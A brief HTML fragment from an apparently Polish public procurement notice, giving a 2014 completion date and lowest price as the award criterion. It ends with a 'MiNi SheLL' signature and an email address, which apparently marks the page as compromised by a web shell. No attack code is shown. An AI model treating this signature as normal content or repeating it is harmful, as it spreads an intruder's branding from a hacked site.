<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 08.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com